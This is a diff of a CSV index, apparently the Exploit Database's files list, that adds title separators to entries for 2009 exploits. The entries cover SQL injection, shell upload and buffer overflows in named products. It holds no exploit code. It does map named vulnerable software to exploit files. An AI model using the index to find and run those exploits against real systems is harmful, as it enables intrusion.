7675,platforms/multiple/local/7675.txt,"Oracle 10g - SYS.LT.REMOVEWORKSPACE SQL Injection",2009-01-06,sh2kerr,multiple,local,0 7676,platforms/multiple/local/7676.txt,"Oracle 10g - SYS.LT.MERGEWORKSPACE SQL Injection",2009-01-06,sh2kerr,multiple,local,0 7677,platforms/multiple/local/7677.txt,"Oracle 10g - SYS.LT.COMPRESSWORKSPACETREE SQL Injection Exploit (1)",2009-01-06,sh2kerr,multiple,local,0 @@ -7243,7 +7243,7 @@ id,file,description,date,author,platform,type,port 7703,platforms/php/webapps/7703.txt,"PHP-Fusion Mod vArcade 1.8 - (comment_id) SQL Injection",2009-01-08,"Khashayar Fereidani",php,webapps,0 7704,platforms/php/webapps/7704.pl,"Pizzis CMS 1.5.1 - (visualizza.php idvar) Blind SQL Injection",2009-01-08,darkjoker,php,webapps,0 7705,platforms/php/webapps/7705.pl,"XOOPS 2.3.2 - (mydirname) Remote PHP Code Execution Exploit",2009-01-08,StAkeR,php,webapps,0 -7706,platforms/windows/remote/7706.mrc,"Anope IRC Services With bs_fantasy_ext 1.2.0-RC1 mIRC script",2009-01-08,Phil,windows,remote,0 +7706,platforms/windows/remote/7706.mrc,"Anope IRC Services With bs_fantasy_ext 1.2.0-RC1 - mIRC script",2009-01-08,Phil,windows,remote,0 7707,platforms/windows/local/7707.py,"IntelliTamper (2.07/2.08) - Language Catalog SEH Overflow Exploit",2009-01-08,Cnaph,windows,local,0 7708,platforms/windows/dos/7708.pl,"MP3 TrackMaker 1.5 - (.mp3) Local Heap Overflow PoC",2009-01-09,Houssamix,windows,dos,0 7709,platforms/windows/dos/7709.pl,"VUPlayer 2.49 - (.asx) (HREF) Local Buffer Overflow PoC",2009-01-09,"aBo MoHaMeD",windows,dos,0 @@ -7291,7 +7291,7 @@ id,file,description,date,author,platform,type,port 7751,platforms/windows/dos/7751.pl,"dBpowerAMP Audio Player 2 - (.pls) Local Buffer Overflow PoC",2009-01-13,Stack,windows,dos,0 7752,platforms/asp/webapps/7752.txt,"DMXReady News Manager 1.1 - Arbitrary Category Change",2009-01-13,ajann,asp,webapps,0 7753,platforms/cgi/webapps/7753.pl,"HSPell 1.1 - (cilla.cgi) Remote Command Execution Exploit",2009-01-13,ZeN,cgi,webapps,0 -7754,platforms/asp/webapps/7754.txt,"DMXReady Account List Manager 1.1 Contents Change",2009-01-13,ajann,asp,webapps,0 +7754,platforms/asp/webapps/7754.txt,"DMXReady Account List Manager 1.1 - Contents Change",2009-01-13,ajann,asp,webapps,0 7755,platforms/windows/remote/7755.html,"PowerPoint Viewer OCX 3.1 - Remote File Execution Exploit",2009-01-13,Cyber-Zone,windows,remote,0 7756,platforms/windows/dos/7756.py,"Nofeel FTP Server 3.6 - (CWD) Remote Memory Consumption Exploit",2009-01-13,His0k4,windows,dos,0 7757,platforms/windows/remote/7757.html,"Word Viewer OCX 3.2 - Remote File Execution Exploit",2009-01-13,Stack,windows,remote,0 @@ -7313,19 +7313,19 @@ id,file,description,date,author,platform,type,port 7773,platforms/asp/webapps/7773.txt,"DMXReady Member Directory Manager 1.1 - SQL Injection",2009-01-14,ajann,asp,webapps,0 7774,platforms/asp/webapps/7774.txt,"DMXReady Members Area Manager 1.2 - SQL Injection",2009-01-14,ajann,asp,webapps,0 7775,platforms/php/webapps/7775.txt,"Joomla Component Camelcitydb2 2.2 - SQL Injection",2009-01-14,H!tm@N,php,webapps,0 -7776,platforms/hardware/dos/7776.c,"Cisco VLAN Trunking Protocol Denial of Service",2009-01-14,showrun,hardware,dos,0 +7776,platforms/hardware/dos/7776.c,"Cisco - VLAN Trunking Protocol Denial of Service",2009-01-14,showrun,hardware,dos,0 7777,platforms/php/webapps/7777.txt,"Joomla Component Fantasytournament - SQL Injection",2009-01-14,H!tm@N,php,webapps,0 7778,platforms/php/webapps/7778.txt,"phpList 2.10.8 - Local File Inclusion",2009-01-14,BugReport.IR,php,webapps,0 7779,platforms/windows/remote/7779.html,"AAA EasyGrid ActiveX 3.51 - Remote File Overwrite Exploit",2009-01-14,Houssamix,windows,remote,0 7780,platforms/php/webapps/7780.pl,"phosheezy 2.0 - Remote Command Execution Exploit",2009-01-14,Osirys,php,webapps,0 7781,platforms/multiple/remote/7781.txt,"Oracle Secure Backup 10g - exec_qr() Command Injection",2009-01-14,"Joxean Koret",multiple,remote,0 -7782,platforms/asp/webapps/7782.txt,"DMXReady PayPal Store Manager 1.1 Contents Change",2009-01-14,ajann,asp,webapps,0 -7783,platforms/asp/webapps/7783.txt,"DMXReady Photo Gallery Manager 1.1 Contents Change",2009-01-14,ajann,asp,webapps,0 -7784,platforms/asp/webapps/7784.txt,"DMXReady Registration Manager 1.1 Contents Change",2009-01-14,ajann,asp,webapps,0 -7785,platforms/multiple/dos/7785.py,"Oracle TimesTen Remote Format String PoC",2009-01-14,"Joxean Koret",multiple,dos,0 +7782,platforms/asp/webapps/7782.txt,"DMXReady PayPal Store Manager 1.1 - Contents Change",2009-01-14,ajann,asp,webapps,0 +7783,platforms/asp/webapps/7783.txt,"DMXReady Photo Gallery Manager 1.1 - Contents Change",2009-01-14,ajann,asp,webapps,0 +7784,platforms/asp/webapps/7784.txt,"DMXReady Registration Manager 1.1 - Contents Change",2009-01-14,ajann,asp,webapps,0 +7785,platforms/multiple/dos/7785.py,"Oracle TimesTen - Remote Format String PoC",2009-01-14,"Joxean Koret",multiple,dos,0 7786,platforms/php/webapps/7786.txt,"Php Photo Album 0.8b - (index.php preview) Local File Inclusion",2009-01-14,Osirys,php,webapps,0 7787,platforms/php/webapps/7787.txt,"DMXReady Secure Document Library 1.1 - SQL Injection",2009-01-14,ajann,php,webapps,0 -7788,platforms/asp/webapps/7788.txt,"DMXReady BillboardManager 1.1 Contents Change",2009-01-14,x0r,asp,webapps,0 +7788,platforms/asp/webapps/7788.txt,"DMXReady BillboardManager 1.1 - Contents Change",2009-01-14,x0r,asp,webapps,0 7789,platforms/asp/webapps/7789.txt,"DMXReady SDK 1.1 - Remote File Download",2009-01-14,ajann,asp,webapps,0 7790,platforms/windows/dos/7790.txt,"netsurf Web browser 1.2 - Multiple Vulnerabilities",2009-01-14,"Jeremy Brown",windows,dos,0 7791,platforms/asp/webapps/7791.txt,"DMXReady Billboard Manager 1.1 - Remote File Upload",2009-01-15,ajann,asp,webapps,0 @@ -7348,11 +7348,11 @@ id,file,description,date,author,platform,type,port 7809,platforms/php/webapps/7809.txt,"Aj Classifieds Real Estate 3.0 - Remote Shell Upload",2009-01-16,ZoRLu,php,webapps,0 7810,platforms/php/webapps/7810.txt,"Aj Classifieds Personals 3.0 - Remote Shell Upload",2009-01-16,ZoRLu,php,webapps,0 7811,platforms/php/webapps/7811.txt,"Aj Classifieds For Sale 3.0 - Remote Shell Upload",2009-01-16,ZoRLu,php,webapps,0 -7812,platforms/multiple/dos/7812.pl,"MPlayer 1.0rc2 TwinVQ Stack Buffer Overflow PoC",2009-01-16,sCORPINo,multiple,dos,0 +7812,platforms/multiple/dos/7812.pl,"MPlayer 1.0rc2 - TwinVQ Stack Buffer Overflow PoC",2009-01-16,sCORPINo,multiple,dos,0 7813,platforms/php/webapps/7813.txt,"Simple PHP Newsletter 1.5 - (olang) Local File Inclusion",2009-01-16,ahmadbady,php,webapps,0 7814,platforms/php/webapps/7814.txt,"BibCiter 1.4 - Multiple SQL Injection",2009-01-16,nuclear,php,webapps,0 7815,platforms/php/webapps/7815.txt,"Joomla Component Gigcal 1.x - (id) SQL Injection",2009-01-18,Lanti-Net,php,webapps,0 -7816,platforms/asp/webapps/7816.txt,"DS-IPN.NET Digital Sales IPN Database Disclosure",2009-01-18,Moudi,asp,webapps,0 +7816,platforms/asp/webapps/7816.txt,"DS-IPN.NET Digital Sales IPN - Database Disclosure",2009-01-18,Moudi,asp,webapps,0 7817,platforms/php/webapps/7817.txt,"Click&Email - (Auth Bypass) SQL Injection",2009-01-18,SuB-ZeRo,php,webapps,0 7818,platforms/php/webapps/7818.txt,"SCMS 1 - (index.php p) Local File Inclusion",2009-01-18,ahmadbady,php,webapps,0 7819,platforms/php/webapps/7819.txt,"ESPG (Enhanced Simple PHP Gallery) 1.72 - File Disclosure",2009-01-18,bd0rk,php,webapps,0 @@ -7377,9 +7377,9 @@ id,file,description,date,author,platform,type,port 7839,platforms/windows/local/7839.py,"Total Video Player 1.31 - (DefaultSkin.ini) Local Stack Overflow Exploit",2009-01-20,His0k4,windows,local,0 7840,platforms/php/webapps/7840.pl,"Joomla Com BazaarBuilder Shopping Cart 5.0 - SQL Injection",2009-01-21,XaDoS,php,webapps,0 7841,platforms/php/webapps/7841.txt,"Mambo Component SOBI2 RC 2.8.2 - (bid) SQL Injection",2009-01-21,"Br1ght D@rk",php,webapps,0 -7842,platforms/windows/remote/7842.html,"Firefox 3.0.5 Status Bar Obfuscation / Clickjacking",2009-01-21,MrDoug,windows,remote,0 +7842,platforms/windows/remote/7842.html,"Firefox 3.0.5 - Status Bar Obfuscation / Clickjacking",2009-01-21,MrDoug,windows,remote,0 7843,platforms/windows/local/7843.c,"Browser3D 3.5 - (.sfs) Local Stack Overflow Exploit (C)",2009-01-22,SimO-s0fT,windows,local,0 -7844,platforms/php/webapps/7844.py,"Sad Raven's Click Counter 1.0 passwd.dat Disclosure Exploit",2009-01-21,Pouya_Server,php,webapps,0 +7844,platforms/php/webapps/7844.py,"Sad Raven's Click Counter 1.0 - passwd.dat Disclosure Exploit",2009-01-21,Pouya_Server,php,webapps,0 7845,platforms/hardware/remote/7845.txt,"AXIS 70U - Network Document Server Privilege Escalation/XSS",2009-01-21,DSecRG,hardware,remote,0 7846,platforms/php/webapps/7846.php,"Joomla com_pcchess - (game_id) Blind SQL Injection",2009-01-21,InjEctOr5,php,webapps,0 7847,platforms/php/webapps/7847.txt,"Joomla Component beamospetition 1.0.12 - SQL Injection / XSS",2009-01-21,vds_s,php,webapps,0 @@ -7409,7 +7409,7 @@ id,file,description,date,author,platform,type,port 7872,platforms/asp/webapps/7872.txt,"E-ShopSystem - (Auth Bypass / SQL Injection) Multiple Vulnerabilities",2009-01-26,InjEctOr5,asp,webapps,0 7873,platforms/php/webapps/7873.txt,"Script Toko Online 5.01 - (shop_display_products.php) SQL Injection",2009-01-26,k1n9k0ng,php,webapps,0 7874,platforms/php/webapps/7874.txt,"SHOP-INET 4 - (show_cat2.php grid) SQL Injection",2009-01-26,FeDeReR,php,webapps,0 -7875,platforms/windows/remote/7875.pl,"WinFTP 2.3.0 - (LIST) Remote Buffer Overflow Exploit (post-auth)",2009-01-26,"joe walko",windows,remote,21 +7875,platforms/windows/remote/7875.pl,"WinFTP 2.3.0 - (LIST) Post-Auth Remote Buffer Overflow Exploit",2009-01-26,"joe walko",windows,remote,21 7876,platforms/php/webapps/7876.php,"PHP-CMS 1 - (username) Blind SQL Injection",2009-01-26,darkjoker,php,webapps,0 7877,platforms/php/webapps/7877.txt,"Wazzum Dating Software - (userid) SQL Injection",2009-01-26,nuclear,php,webapps,0 7878,platforms/php/webapps/7878.txt,"Groone's GLink Organizer - (index.php cat) SQL Injection",2009-01-26,nuclear,php,webapps,0 @@ -7481,7 +7481,7 @@ id,file,description,date,author,platform,type,port 7948,platforms/php/webapps/7948.php,"phpslash 0.8.1.1 - Remote Code Execution Exploit",2009-02-02,DarkFig,php,webapps,0 7949,platforms/php/webapps/7949.rb,"OpenHelpDesk 1.0.100 - eval() Code Execution Exploit (Metasploit)",2009-02-02,LSO,php,webapps,0 18164,platforms/android/webapps/18164.php,"Android 'content://' URI - Multiple Information Disclosure Vulnerabilities",2011-11-28,"Thomas Cannon",android,webapps,0 -7951,platforms/php/webapps/7951.txt,"WholeHogSoftware Ware Support Insecure Cookie Handling",2009-02-03,Stack,php,webapps,0 +7951,platforms/php/webapps/7951.txt,"WholeHogSoftware Ware Support - Insecure Cookie Handling",2009-02-03,Stack,php,webapps,0 7952,platforms/php/webapps/7952.txt,"WholeHogSoftware Password Protect - Insecure Cookie Handling",2009-02-03,Stack,php,webapps,0 7953,platforms/php/webapps/7953.txt,"ClickCart 6.0 - (Auth Bypass) SQL Injection",2009-02-03,R3d-D3V!L,php,webapps,0 7954,platforms/php/webapps/7954.txt,"groone glinks 2.1 - Remote File Inclusion",2009-02-03,"k3vin mitnick",php,webapps,0 @@ -7503,7 +7503,7 @@ id,file,description,date,author,platform,type,port 7972,platforms/php/webapps/7972.py,"Openfiler 2.3 - (Auth Bypass) Remote Password Change Exploit",2009-02-03,nonroot,php,webapps,0 7973,platforms/windows/local/7973.pl,"Euphonics Audio Player 1.0 - (.pls) Universal Local Buffer Overflow Exploit",2009-02-04,Houssamix,windows,local,0 7974,platforms/windows/local/7974.c,"Euphonics Audio Player 1.0 - (.pls) Local Buffer Overflow Exploit (xp/sp3)",2009-02-04,"Single Eye",windows,local,0 -7975,platforms/windows/local/7975.py,"BlazeVideo HDTV Player 3.5 PLF Playlist File Remote Overflow Exploit",2009-02-04,LiquidWorm,windows,local,0 +7975,platforms/windows/local/7975.py,"BlazeVideo HDTV Player 3.5 - .PLF Playlist File Remote Overflow Exploit",2009-02-04,LiquidWorm,windows,local,0 7976,platforms/php/webapps/7976.txt,"Jaws 0.8.8 - Multiple Local File Inclusion",2009-02-04,fuzion,php,webapps,0 7977,platforms/php/webapps/7977.txt,"Syntax Desktop 2.7 - (synTarget) Local File Inclusion",2009-02-04,ahmadbady,php,webapps,0 7978,platforms/php/webapps/7978.txt,"rgboard 4 5p1 (07.07.27) - Multiple Vulnerabilities",2009-02-04,make0day,php,webapps,0 @@ -7517,12 +7517,12 @@ id,file,description,date,author,platform,type,port 7987,platforms/php/webapps/7987.txt,"gr blog 1.1.4 - (upload/bypass) Multiple Vulnerabilities",2009-02-04,JosS,php,webapps,0 7988,platforms/windows/remote/7988.pl,"Amaya Web Browser 11 - (bdo tag) Remote Stack Overflow Exploit (xp)",2009-02-04,"Rob Carter",windows,remote,0 7989,platforms/windows/remote/7989.pl,"Amaya Web Browser 11 - (bdo tag) Remote Stack Overflow Exploit (vista)",2009-02-04,"Rob Carter",windows,remote,0 -7990,platforms/windows/dos/7990.py,"UltraVNC/TightVNC Multiple VNC Clients Multiple Integer Overflow PoC",2009-02-04,"Andres Luksenberg",windows,dos,0 +7990,platforms/windows/dos/7990.py,"UltraVNC/TightVNC - Multiple VNC Clients Multiple Integer Overflow PoC",2009-02-04,"Andres Luksenberg",windows,dos,0 7991,platforms/asp/webapps/7991.txt,"GR Note 0.94 beta - (Auth Bypass) Remote Database Backup",2009-02-04,JosS,asp,webapps,0 7992,platforms/php/webapps/7992.txt,"ClearBudget 0.6.1 - Insecure Cookie Handling / LFI",2009-02-05,SirGod,php,webapps,0 7993,platforms/php/webapps/7993.txt,"Kipper 2.01 - (XSS/LFI/DD) Multiple Vulnerabilities",2009-02-05,RoMaNcYxHaCkEr,php,webapps,0 7994,platforms/windows/local/7994.c,"dBpowerAMP Audio Player 2 - (.pls) Local Buffer Overflow Exploit",2009-02-05,SimO-s0fT,windows,local,0 -7995,platforms/windows/dos/7995.pl,"FeedMon 2.7.0.0 outline Tag Buffer Overflow Exploit PoC",2009-02-05,"Praveen Darshanam",windows,dos,0 +7995,platforms/windows/dos/7995.pl,"FeedMon 2.7.0.0 - outline Tag Buffer Overflow Exploit PoC",2009-02-05,"Praveen Darshanam",windows,dos,0 7996,platforms/php/webapps/7996.txt,"ClearBudget 0.6.1 - (Misspelled htaccess) Insecure DD",2009-02-05,Room-Hacker,php,webapps,0 7997,platforms/php/webapps/7997.htm,"txtBB 1.0 RC3 HTML/JS Injection - Add Admin Privileges Exploit",2009-02-05,cOndemned,php,webapps,0 7998,platforms/php/webapps/7998.txt,"WikkiTikkiTavi 1.11 - Remote PHP File Upload",2009-02-06,ByALBAYX,php,webapps,0 @@ -7535,9 +7535,9 @@ id,file,description,date,author,platform,type,port 8005,platforms/php/webapps/8005.txt,"phpYabs 0.1.2 - (Azione) Remote File Inclusion",2009-02-06,Arka69,php,webapps,0 8006,platforms/php/webapps/8006.txt,"Traidnt UP 1.0 - Remote File Upload",2009-02-09,fantastic,php,webapps,0 8007,platforms/php/webapps/8007.php,"IF-CMS 2.0 - (frame.php id) Blind SQL Injection",2009-02-09,darkjoker,php,webapps,0 -8008,platforms/hardware/dos/8008.txt,"Netgear embedded Linux for the SSL312 router DoS",2009-02-09,Rembrandt,hardware,dos,0 +8008,platforms/hardware/dos/8008.txt,"Netgear embedded Linux for the SSL312 router - DoS",2009-02-09,Rembrandt,hardware,dos,0 8009,platforms/php/webapps/8009.pl,"w3bcms 3.5.0 - Multiple Vulnerabilities",2009-02-09,DNX,php,webapps,0 -8010,platforms/windows/local/8010.pl,"FeedDemon 2.7 OPML Outline Tag Buffer Overflow Exploit",2009-02-09,cenjan,windows,local,0 +8010,platforms/windows/local/8010.pl,"FeedDemon 2.7 - OPML Outline Tag Buffer Overflow Exploit",2009-02-09,cenjan,windows,local,0 8011,platforms/php/webapps/8011.txt,"BusinessSpace 1.2 - (id) SQL Injection",2009-02-09,K-159,php,webapps,0 8012,platforms/php/webapps/8012.txt,"A Better Member-Based ASP Photo Gallery - (entry) SQL Injection",2009-02-09,BackDoor,php,webapps,0 8013,platforms/hardware/dos/8013.txt,"Nokia N95-8 - (.JPG) Remote Crash PoC",2009-02-09,"Juan Yacubian",hardware,dos,0 @@ -7551,7 +7551,7 @@ id,file,description,date,author,platform,type,port 8021,platforms/multiple/dos/8021.pl,"Squid < 3.1 5 - HTTP Version Number Parsing Denial of Service",2009-02-09,"Praveen Darshanam",multiple,dos,0 8022,platforms/hardware/remote/8022.txt,"3Com OfficeConnect Wireless Cable/DSL Router - Authentication Bypass",2009-02-09,ikki,hardware,remote,0 8023,platforms/hardware/remote/8023.txt,"ZeroShell 1.0beta11 - Remote Code Execution",2009-02-09,ikki,hardware,remote,0 -8024,platforms/windows/dos/8024.py,"TightVNC Authentication Failure Integer Overflow PoC",2009-02-09,desi,windows,dos,0 +8024,platforms/windows/dos/8024.py,"TightVNC - Authentication Failure Integer Overflow PoC",2009-02-09,desi,windows,dos,0 8025,platforms/php/webapps/8025.txt,"webframe 0.76 - Multiple File Inclusion",2009-02-09,ahmadbady,php,webapps,0 8026,platforms/php/webapps/8026.txt,"WB News 2.1.1 - config[installdir] Remote File Inclusion",2009-02-09,ahmadbady,php,webapps,0 8027,platforms/php/webapps/8027.txt,"Gaeste 1.6 - (gastbuch.php) Remote File Disclosure",2009-02-09,bd0rk,php,webapps,0 @@ -7596,7 +7596,7 @@ id,file,description,date,author,platform,type,port 8067,platforms/multiple/local/8067.txt,"Enomaly ECP / Enomalism < 2.2.1 - Multiple Local Vulnerabilities",2009-02-16,"Sam Johnston",multiple,local,0 8068,platforms/php/webapps/8068.txt,"ravennuke 2.3.0 - Multiple Vulnerabilities",2009-02-16,waraxe,php,webapps,0 8069,platforms/php/webapps/8069.txt,"Grestul 1.x - Auth Bypass by Cookie SQL Injection",2009-02-16,x0r,php,webapps,0 -8070,platforms/asp/webapps/8070.txt,"SAS Hotel Management System Remote Shell Upload",2009-02-17,ZoRLu,asp,webapps,0 +8070,platforms/asp/webapps/8070.txt,"SAS Hotel Management System - Remote Shell Upload",2009-02-17,ZoRLu,asp,webapps,0 8071,platforms/php/webapps/8071.txt,"S-CMS 1.1 Stable - Insecure Cookie Handling / Mass Page Delete Vulnerabilities",2009-02-17,x0r,php,webapps,0 8072,platforms/php/webapps/8072.txt,"pHNews Alpha 1 - (header.php mod) SQL Injection",2009-02-17,x0r,php,webapps,0 8073,platforms/php/webapps/8073.txt,"pHNews Alpha 1 - (genbackup.php) Database Disclosure",2009-02-17,x0r,php,webapps,0 @@ -7620,7 +7620,7 @@ id,file,description,date,author,platform,type,port 8093,platforms/php/webapps/8093.pl,"pPIM 1.01 - (notes.php id) Remote Command Execution Exploit",2009-02-23,JosS,php,webapps,0 8094,platforms/php/webapps/8094.pl,"Free Arcade Script 1.0 - LFI Command Execution Exploit",2009-02-23,Osirys,php,webapps,0 8095,platforms/php/webapps/8095.pl,"Pyrophobia 2.1.3.1 - LFI Command Execution Exploit",2009-02-23,Osirys,php,webapps,0 -8096,platforms/hardware/remote/8096.txt,"Optus/Huawei E960 HSDPA Router Sms XSS Attack",2009-02-23,"Rizki Wicaksono",hardware,remote,0 +8096,platforms/hardware/remote/8096.txt,"Optus/Huawei E960 HSDPA Router - Sms XSS Attack",2009-02-23,"Rizki Wicaksono",hardware,remote,0 8097,platforms/multiple/remote/8097.txt,"MLdonkey 2.9.7 - HTTP DOUBLE SLASH Arbitrary File Disclosure",2009-02-23,"Michael Peselnik",multiple,remote,0 8098,platforms/php/webapps/8098.txt,"taifajobs 1.0 - (jobid) SQL Injection",2009-02-23,K-159,php,webapps,0 8099,platforms/windows/dos/8099.pl,"Adobe Acrobat Reader - JBIG2 Local Buffer Overflow PoC (2) (0Day)",2009-02-23,"Guido Landi",windows,dos,0 @@ -7632,27 +7632,27 @@ id,file,description,date,author,platform,type,port 8106,platforms/hardware/dos/8106.txt,"Netgear WGR614v9 - Wireless Router Get Request Denial of Service",2009-02-25,staticrez,hardware,dos,0 8107,platforms/asp/webapps/8107.txt,"PenPal 2.0 - (Auth Bypass) SQL Injection",2009-02-25,ByALBAYX,asp,webapps,0 8108,platforms/osx/local/8108.c,"Apple MACOS X xnu 1228.x - Local Kernel Memory Disclosure Exploit",2009-02-25,mu-b,osx,local,0 -8109,platforms/asp/webapps/8109.txt,"SkyPortal Classifieds System 0.12 Contents Change",2009-02-25,ByALBAYX,asp,webapps,0 -8110,platforms/asp/webapps/8110.txt,"SkyPortal Picture Manager 0.11 Contents Change",2009-02-25,ByALBAYX,asp,webapps,0 -8111,platforms/asp/webapps/8111.txt,"SkyPortal WebLinks 0.12 Contents Change",2009-02-25,ByALBAYX,asp,webapps,0 +8109,platforms/asp/webapps/8109.txt,"SkyPortal Classifieds System 0.12 - Contents Change",2009-02-25,ByALBAYX,asp,webapps,0 +8110,platforms/asp/webapps/8110.txt,"SkyPortal Picture Manager 0.11 - Contents Change",2009-02-25,ByALBAYX,asp,webapps,0 +8111,platforms/asp/webapps/8111.txt,"SkyPortal WebLinks 0.12 - Contents Change",2009-02-25,ByALBAYX,asp,webapps,0 8112,platforms/php/webapps/8112.txt,"Golabi CMS - Remote File Inclusion",2009-02-26,CrazyAngel,php,webapps,0 8113,platforms/asp/webapps/8113.txt,"DesignerfreeSolutions Newsletter Manager Pro - Auth Bypass",2009-02-26,ByALBAYX,asp,webapps,0 8114,platforms/php/webapps/8114.txt,"Coppermine Photo Gallery 1.4.20 - (BBCode IMG) Privilege Escalation",2009-02-26,StAkeR,php,webapps,0 8115,platforms/php/webapps/8115.pl,"Coppermine Photo Gallery 1.4.20 - (IMG) Privilege Escalation Exploit",2009-02-26,Inphex,php,webapps,0 8116,platforms/php/webapps/8116.txt,"BannerManager 0.81 - (Auth Bypass) SQL Injection",2009-02-26,rootzig,php,webapps,0 -8117,platforms/windows/remote/8117.pl,"POP Peeper 3.4.0.0 UIDL Remote Buffer Overflow Exploit (SEH)",2009-02-27,"Jeremy Brown",windows,remote,0 -8118,platforms/windows/remote/8118.html,"Orbit 2.8.4 Long Hostname Remote Buffer Overflow Exploit",2009-02-27,JavaGuru,windows,remote,0 +8117,platforms/windows/remote/8117.pl,"POP Peeper 3.4.0.0 - UIDL Remote Buffer Overflow Exploit (SEH)",2009-02-27,"Jeremy Brown",windows,remote,0 +8118,platforms/windows/remote/8118.html,"Orbit 2.8.4 - Long Hostname Remote Buffer Overflow Exploit",2009-02-27,JavaGuru,windows,remote,0 8120,platforms/asp/webapps/8120.txt,"SkyPortal Downloads Manager 1.1 - Remote Contents Change",2009-02-27,ByALBAYX,asp,webapps,0 8121,platforms/windows/local/8121.pl,"Hex Workshop 6.0 - (.HEX) Local Code Execution Exploit",2009-02-27,DATA_SNIPER,windows,local,0 8123,platforms/php/webapps/8123.txt,"irokez blog 0.7.3.2 - (XSS/RFI/bSQL) Multiple Vulnerabilities",2009-02-27,Corwin,php,webapps,0 8124,platforms/php/webapps/8124.txt,"Demium CMS 0.2.1b - Multiple Vulnerabilities",2009-02-27,Osirys,php,webapps,0 -8125,platforms/hardware/dos/8125.rb,"HTC Touch vCard over IP Denial of Service",2009-03-02,"Mobile Security Lab",hardware,dos,0 +8125,platforms/hardware/dos/8125.rb,"HTC Touch - vCard over IP Denial of Service",2009-03-02,"Mobile Security Lab",hardware,dos,0 8126,platforms/windows/local/8126.py,"Merak Media PLayer 3.2 - .m3u File Local Buffer Overflow Exploit (SEH)",2009-03-02,"Encrypt3d.M!nd ",windows,local,0 8127,platforms/php/webapps/8127.txt,"blogman 0.45 - Multiple Vulnerabilities",2009-03-02,"Salvatore Fresta",php,webapps,0 8128,platforms/php/webapps/8128.txt,"EZ-Blog 1b - Delete All Posts / SQL Injection",2009-03-02,"Salvatore Fresta",php,webapps,0 8129,platforms/windows/dos/8129.pl,"Novell eDirectory iMonitor (Accept-Language) Request BoF PoC",2009-03-02,"Praveen Darshanam",windows,dos,0 8130,platforms/asp/webapps/8130.txt,"Document Library 1.0.1 - Arbitrary Change Admin",2009-03-02,ByALBAYX,asp,webapps,0 -8131,platforms/asp/webapps/8131.txt,"Digital Interchange Calendar 5.7.13 Contents Change",2009-03-02,ByALBAYX,asp,webapps,0 +8131,platforms/asp/webapps/8131.txt,"Digital Interchange Calendar 5.7.13 - Contents Change",2009-03-02,ByALBAYX,asp,webapps,0 8132,platforms/asp/webapps/8132.txt,"Access2asp - imageLibrary Arbitrary ASP Shell Upload",2009-03-02,mr.al7rbi,asp,webapps,0 8133,platforms/php/webapps/8133.txt,"Graugon PHP Article Publisher 1.0 - (SQL/CH) Multiple Remote Vulnerabilities",2009-03-02,x0r,php,webapps,0 8134,platforms/php/webapps/8134.php,"Joomla com_digistore - (pid) Blind SQL Injection",2009-03-02,InjEctOr5,php,webapps,0 @@ -7663,7 +7663,7 @@ id,file,description,date,author,platform,type,port 8139,platforms/php/webapps/8139.txt,"ritsblog 0.4.2 - (ab/XSS) Multiple Vulnerabilities",2009-03-02,"Salvatore Fresta",php,webapps,0 8140,platforms/php/webapps/8140.txt,"Zabbix 1.6.2 Frontend - Multiple Vulnerabilities",2009-03-03,USH,php,webapps,0 8141,platforms/php/webapps/8141.txt,"blindblog 1.3.1 - (SQL/ab/LFI) Multiple Vulnerabilities",2009-03-03,"Salvatore Fresta",php,webapps,0 -8142,platforms/windows/remote/8142.py,"EFS Easy Chat Server Authentication Request BoF Exploit (SEH)",2009-03-03,His0k4,windows,remote,80 +8142,platforms/windows/remote/8142.py,"EFS Easy Chat Server - Authentication Request BoF Exploit (SEH)",2009-03-03,His0k4,windows,remote,80 8143,platforms/windows/remote/8143.html,"Sopcast SopCore Control - (sopocx.ocx) Command Execution Exploit",2009-03-03,Nine:Situations:Group,windows,remote,0 8144,platforms/windows/remote/8144.txt,"Imera ImeraIEPlugin - ActiveX Control Remote Code Execution Exploit",2009-03-03,Elazar,windows,remote,0 8145,platforms/php/webapps/8145.txt,"ghostscripter Amazon Shop - (XSS/DT/RFI) Multiple Vulnerabilities",2009-03-03,d3b4g,php,webapps,0 @@ -7690,7 +7690,7 @@ id,file,description,date,author,platform,type,port 8171,platforms/windows/local/8171.py,"Nokia Multimedia Player 1.0 - (playlist) Universal SEH Overwrite Exploit",2009-03-09,His0k4,windows,local,0 8172,platforms/php/webapps/8172.txt,"cms s.builder 3.7 - Remote File Inclusion",2009-03-09,cr0w,php,webapps,0 8173,platforms/windows/remote/8173.txt,"Belkin BullDog Plus UPS-Service - Buffer Overflow Exploit",2009-03-09,Elazar,windows,remote,0 -8174,platforms/windows/local/8174.py,"Realtek Sound Manager 1.15.0.0 PlayList SEH Overwrite Exploit",2009-03-09,His0k4,windows,local,0 +8174,platforms/windows/local/8174.py,"Realtek Sound Manager 1.15.0.0 - PlayList SEH Overwrite Exploit",2009-03-09,His0k4,windows,local,0 8175,platforms/windows/local/8175.txt,"mks_vir 9b < 1.2.0.0b297 - (mksmonen.sys) Privilege Escalation Exploit",2009-03-09,"NT Internals",windows,local,0 8176,platforms/windows/local/8176.py,"EO Video 1.36 - PlayList SEH Overwrite Exploit",2009-03-09,His0k4,windows,local,0 8177,platforms/windows/local/8177.py,"RadASM 2.2.1.5 - (.RAP) Local Stack Overflow Exploit",2009-03-09,zAx,windows,local,0 @@ -7703,11 +7703,11 @@ id,file,description,date,author,platform,type,port 8184,platforms/php/webapps/8184.txt,"CS-Cart 2.0.0 Beta 3 - (product_id) SQL Injection",2009-03-09,netsoul,php,webapps,0 8185,platforms/php/webapps/8185.txt,"phpCommunity 2.1.8 - (SQL/DT/XSS) Multiple Vulnerabilities",2009-03-09,"Salvatore Fresta",php,webapps,0 8186,platforms/php/webapps/8186.txt,"PHP-Fusion Mod Book Panel - (bookid) SQL Injection",2009-03-09,elusiven,php,webapps,0 -8187,platforms/hardware/dos/8187.sh,"Addonics NAS Adapter Post-Auth Denial of Service",2009-03-09,h00die,hardware,dos,0 +8187,platforms/hardware/dos/8187.sh,"Addonics NAS Adapter - Post-Auth Denial of Service",2009-03-09,h00die,hardware,dos,0 8188,platforms/php/webapps/8188.txt,"CMS WEBjump! - Multiple SQL Injection",2009-03-10,M3NW5,php,webapps,0 8189,platforms/windows/local/8189.txt,"VUPlayer 2.49 - (.cue) Universal Buffer Overflow Exploit",2009-03-10,Stack,windows,local,0 -8190,platforms/windows/dos/8190.txt,"IBM Director 5.20.3su2 CIM Server Remote DoS",2009-03-10,"Bernhard Mueller",windows,dos,0 -8191,platforms/multiple/remote/8191.txt,"NextApp Echo < 2.1.1 XML Injection",2009-03-10,"SEC Consult",multiple,remote,0 